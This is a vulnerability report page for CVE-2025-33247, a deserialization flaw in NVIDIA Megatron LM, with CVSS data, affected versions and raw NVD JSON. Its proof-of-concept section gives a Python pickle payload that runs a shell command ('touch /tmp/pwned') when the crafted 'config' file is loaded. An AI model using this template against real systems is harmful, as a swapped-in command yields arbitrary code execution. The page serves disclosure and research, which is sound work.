Security Vulnerability Report
CVE-2025-33247 CVSS 7.8 HIGH

CVE-2025-33247

Published: 2026-03-24 21:16:25
Last Modified: 2026-03-25 21:58:57

Description

NVIDIA Megatron LM contains a vulnerability in quantization configuration loading, which could allow remote code execution. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nvidia:megatron-lm:*:*:*:*:*:*:*:* - VULNERABLE
NVIDIA Megatron LM (for the specific affected versions, refer to NVIDIA's official security advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import pickle
import os

# Malicious payload to execute a shell command (e.g., creating a file)
class Exploit:
    def __reduce__(self):
        # Execute 'touch /tmp/pwned' upon deserialization
        return (os.system, ('touch /tmp/pwned',))

# Serialize the malicious object
with open('malicious_config.json', 'wb') as f:
    pickle.dump(Exploit(), f)

print("Malicious configuration file 'malicious_config.json' generated.")
print("When Megatron LM loads this file, the command will be executed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-33247", "sourceIdentifier": "[email protected]", "published": "2026-03-24T21:16:24.610", "lastModified": "2026-03-25T21:58:57.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA Megatron LM contains a vulnerability in quantization configuration loading, which could allow remote code execution. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering."}, {"lang": "es", "value": "NVIDIA Megatron LM contiene una vulnerabilidad en la carga de la configuración de cuantificación, lo que podría permitir la ejecución remota de código. Un exploit exitoso de esta vulnerabilidad podría conducir a la ejecución de código, escalada de privilegios, revelación de información y manipulación de datos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": 
[{"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:megatron-lm:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.15.3", "matchCriteriaId": "05221D08-E8D5-4CBE-8B4E-8CE4C8176AB4"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33247", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5769", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-33247", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}